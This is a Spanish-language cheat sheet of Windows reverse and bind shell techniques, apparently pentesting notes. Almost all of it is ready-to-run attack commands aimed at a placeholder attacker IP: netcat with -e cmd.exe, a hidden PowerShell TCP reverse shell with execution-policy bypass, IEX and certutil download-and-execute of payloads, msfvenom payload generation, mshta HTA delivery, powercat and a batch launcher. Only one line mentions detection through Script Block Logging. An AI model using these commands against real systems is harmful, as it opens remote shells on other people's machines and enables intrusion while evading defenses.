Windows

Netcat

# Máquina atacante
rlwrap nc -lvnp <listen-port>

# Máquina víctima
.\nc.exe -e cmd.exe <attacker-IP-address> <listen-port>

PowerShell

Reverse shells

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker-IP-address>",<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

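Reverse shell de Windows a Linux/Unix: la máquina Windows descarga shell.ps1 del servidor HTTP del atacante y lo ejecuta en memoria con IEX, y la conexión de vuelta llega al listener de Netcat. Con Script Block Logging habilitado, PowerShell registra el contenido del script ejecutado (evento 4104).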

# Máquina atacante
# reverse shell (shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# HTTP server
python3 -m http.server 80
# Netcat
nc -lvnp <listen-port>

# Máquina víctima
# descarga y ejecución de reverse shell
powershell IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/shell.ps1')

Reverse shell de Windows a Windows: el atacante sirve el script desde un HttpListener de PowerShell y recibe la conexión con powercat.

# Máquina atacante
# HTTP server
Add-Type -AssemblyName "System.Web";$HTTPListener=New-Object Net.HttpListener;$HTTPListener.Prefixes.Add("http://<attacker-IP-address>:80/");$HTTPListener.Start();While ($HTTPListener.IsListening){$HC=$HTTPListener.GetContext();$HRes=$HC.Response;$HRes.Headers.Add("Content-Type",[System.Web.MimeMapping]::GetMimeMapping($HC.Request.RawUrl));$Stream=[System.IO.File]::OpenRead((Join-Path $Pwd ($HC.Request.RawUrl)));$HRes.ContentLength64=$Stream.Length;$Stream.CopyTo($HRes.OutputStream);$Stream.Close();$HRes.Close()};$HTTPListener.Stop()
# Powercat
Import-Module .\powercat.ps1
powercat -l -v -p <listen-port>

# Máquina víctima
# descarga y ejecución de reverse shell
powershell IEX(iwr http://<attacker-IP-address>:80/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress <attacker-IP-address> -Port <listen-port>

Bind shells

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]<listen-port>; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Metasploit

# Máquina atacante
msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-IP-address> lport=<listen-port> -f exe -o reverse-shell.exe
rlwrap nc -lvnp <listen-port>
python3 -m http.server 80

# Máquina víctima
certutil.exe -f -urlcache -split http://<attacker-IP-address>:80/reverse-shell.exe c:\windows\temp\reverse-shell.exe && cmd.exe /c c:\windows\temp\reverse-shell.exe
# Máquina atacante
use exploit/windows/misc/hta_server
set SRVHOST <attacker-IP-address>
set SRVPORT <port>
run

# Máquina víctima
mshta http://<attacker-IP-address>:<port>/<id>.hta

Archivo batch (.bat)

# Máquina atacante
nc -lvnp <listen-port>

# Máquina víctima
echo C:\<path>\nc.exe -e cmd.exe <attacker-IP-address> <listen-port> > C:\<path>\<file.bat>
